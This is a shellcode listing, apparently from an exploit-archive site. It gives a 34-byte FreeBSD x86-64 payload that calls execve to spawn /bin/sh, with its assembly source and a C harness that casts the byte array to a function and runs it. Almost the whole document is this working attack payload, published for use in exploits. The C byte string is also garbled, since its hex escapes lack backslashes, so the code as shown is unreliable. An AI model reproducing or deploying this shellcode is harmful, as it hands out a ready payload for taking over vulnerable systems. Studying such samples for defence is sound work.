freebsd/x86-64 execve /bin/sh shellcode 34 bytes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : freebsd/x86-64 execve /bin/sh shellcode 34 bytes
# Published : 2009-05-15
# Author : c0d3_z3r0
# Previous Title : freebsd/x86-64 exec("/bin/sh") shellcode 31 bytes
# Next Title : linux/x86-64 setuid(0) + execve(/bin/sh) 49 bytes

/*
Anderson Eduardo < c0d3_z3r0 >
Hack'n Roll
http://anderson.hacknroll.com
http://blog.hacknroll.com 
 
.section .text
.globl _start
_start:
 

        xor %rcx,%rcx
        jmp string
 
        main:
 
        popq %rsi
        movq %rsi,%rdi
 
        pushq %rsi
        pushq %rcx
        movq %rsp,%rsi
 
        movq %rcx,%rdx
        movb $0x3b,%al
        syscall
 
        string:
        callq main
        .string "/bin/sh"
 

*/
 
int main(void)
{
char shellcode[] =
"x48x31xc9"
"xebx10"
"x5e"
"x48x89xf7"
"x56"
"x51"
"x48x89xe6"
"x48x89xca"
"xb0x3b"
"x0fx05"
"x48xe8xeaxffxffxff"
"x2f"
"x62"
"x69"
"x6e"
"x2f"
"x73x68";
 
        (*(void (*)()) shellcode)();
 
//Hack'n Roll
 
return 0;
} 

// www.Syue.com [2009-05-15]